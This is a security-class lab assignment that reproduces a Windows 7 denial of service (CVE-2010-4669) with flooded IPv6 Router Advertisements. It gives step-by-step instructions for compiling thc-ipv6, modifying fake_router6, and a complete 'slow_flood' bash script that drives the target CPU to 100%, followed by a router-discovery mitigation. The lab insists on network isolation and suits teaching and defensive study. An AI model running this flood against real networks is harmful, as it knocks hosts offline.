Project 8x: Win 7 DoS by RA Packets (20 pts.)

What you Need

Isolating your Network

The simplest way to do it is to run both the attacker and defender as virtual machines on the same host, and run in NAT networking mode.

Another way to do it is to use a router from the closet in S214 and physically isolate your machines from the rest of the network.

If you do not understand the last two sentences, STOP and do not attempt this project. WAIT until you can get supervision from Sam or another student who understands what network isolation is.

Start the Target Windows 7 Machine

Start the Windows 7 target machine and log in.

Open a Command Prompt and execute the IPCONFIG commmand. You should see an IPv6 address starting with fe80::, as shown below on this page:

Downloading and Compiling thc-ipv6

BackTrack 4 R2 includes the thc-ipv6 attack toolkit, but for some reason I cannot modify and recompile the tools. And you may be better off using Ubuntu for this project anyway, because IPv6 seems to be very unstable and unreliable in BackTrack. So we will just download the tools and compile them.

In the Linux machine, open Firefox and go to

http://freeworld.thc.org/thc-ipv6

Click the thc-ipv6-1.4.tar.gz link. In the "Opening thc-ipv6-1.4.tar.gz" box, click the "Save File" button. Click OK.

Save the file in the root directory.

On your Linux machine, in a Terminal window, execute these commands:

apt-get install libnet-pcap-perl

apt-get install libpcap0.8-dev

apt-get install libssl-dev

cd /root

tar xzf thc-ipv6-1.4.tar.gz

cd thc-ipv6-1.4

make

Sending a Single Router Advertisement

On the Linux machine, execute these commands:

cd /root/thc-ipv6-1.4

./fake_router6 eth0 1::/64

This starts sending Router Advertisements. Press Ctrl+C to stop it--one RA is all we need.

Observing the New IPv6 Address on the Windows 7 Target Machine

On the Windows 7 target machine, in the Command Prompt window, execute the IPCONFIG commmand. You should see two IPv6 addresses starting with 1::, as shown below on this page:

These addresses are there because the Stateless Autoconfiguration process is operating by default, creating IPv6 addresses in response to every Router Advertisement packet the Windows 7 machine receives.

The problem is that Windows consumes far too much CPU time to configure these addresses, as we will see below.

Creating the single_ra Attack Tool

The fake_router6 tool sends a series of identical Router Advertisement packets, but we want to send only one. So we need to modify the tool.

On the Linux machine, execute these commands:

cd /root/thc-ipv6-1.4

cp fake_router6.c single_ra.c

nano single_ra.c

Press the down-arrow key to scroll to the end of the file. You should see the last few lines of C code, as shown below on this page:

Move the cursor to the printf command and press Ctrl+K to delete it.

Press Ctrl+K again to delete the while (1) { line.

Press the down-arrow key to move just below the line starting with thc_send.

Press Ctrl+K twice more to delete the sleep(5) line and the line below it.

Your screen should now look like the figure shown below on this page:

Save the file by pressing Ctrl+X, Y, Enter.

Modifying the Makefile

On the Linux machine, execute this commands:

nano Makefile

Use the arrow keys to move to the right-hand end of the line beginning with PROGRAMS=.

Append single_ra to the end of that line, as shown below on this page:

Save the file by pressing Ctrl+X, Y, Enter.

On the Linux machine, execute these commands:

make

./single_ra eth0 3::/64

On the Windows 7 target machine, in the Command Prompt window, execute the IPCONFIG commmand. You should see IPv6 addresses starting with 3::, as shown below on this page:

Creating the slow_flood Tool

On the Linux machine, execute this command:

nano slow_flood

Enter this program into the editor, as shown below on this page:

#!/bin/bash

for i in {1..100}
do
      for j in $(eval echo {1..$1})
      do
           ./single_ra eth0 "4:$i:$j::/64"
      done
      echo "Sent $1 RAs for network 4:$i"
      sleep 1
done

Save the file by pressing Ctrl+X, Y, Enter.

On the Linux machine, execute these commands:

chmod a+x slow_flood

./slow_flood 1

You should see messages scrolling by on the Linux machine, like this:

On the Windows 7 target, in a Command Prompt window, execute the IPCONFIG command. You should see a lot of IPv6 addresses, as shown below on this page:

Saving the Image

Save a screen image showing many IPv6 addresses. Give it a filename of Proj 8x from YOUR NAME.

Restoring the Windows Target to a Normal State

On the Linux machine, if the slow_flood attack is still running, type Ctrl+C to stop it.

If the Windows machine is unresponsive, you will need to power it off and start it again.

If the Windows machine still works, click Start and type in NETWORK CONNECTIONS. Click View network connections. Right-click "Local Area Connection" and click Disable.

Right-click "Local Area Connection" and click Enable.

In a Command Prompt window, execute the IPCONFIG command. Verify that all the extra IPv6 addresses are gone.

Measuring the Burden on the Windows Target

On the Windows target, right-click the taskbar at the bottom of the desktop and click Start Task Manager.

In Task Manager, click the Performance tab. The CPU Usage History should be near 0%, as shown in the figure below on this page:

Restarting the Attack

On the Linux machine, execute this command:

./slow_flood 1

You should see the CPU usage rise to a steady value during the attack, as shown below on this page. On my system, one RA per second caused a CPU usage of about 21%.

Testing Faster Attacks

On the Linux machine, try other numbers of RAs per second and see how many it takes to stop the Windows target completely, such as 6 RAs per second with this command:

./slow_flood 6

In my tests, 6 RAs per second were enough to use 100% of the CPU.

Mitigation

As far as I know, there is no patch yet from Microsoft. Disabling IPv6 protects your Windows machines, but that is an excessively drastic solution. I therefore recommend turning off Router Discovery.

On the Windows target, click Start and type in CMD. In the Search Results, right-click "cmd - Shortcut" and click "Run as administrator". In the "User Account Control" box, click Yes.

In the Administrator Command Prompt window, enter this command, and then press the Enter key:

netsh interface ipv6 set interface "Local Area Connection" routerdiscovery=disabled

Showing that the Attack is Now Harmless

On the Linux machine, restart an attack that is fast enough to heavily burden the Windows machine, such as:

./slow_flood 6

The Windows machine should no longer show a high CPU from this attack, as shown below on this page.

Turning In Your Project

Email the image to [email protected] with a subject line of Proj 8x from YOUR NAME.

References

I found that solution here:

http://social.technet.microsoft.com/Forums/en-US/w7itpronetworking/thread/768252f8-8872-453b-aa8f-1c4fd6c52856

Multiple Vendors IPv6 Neighbor Discovery Router Advertisement Remote Denial of Service Vulnerability

CVE-2010-4669 - Router Advertisements Cause DoS in Windows


Last modified 11:30 pm 4-7-11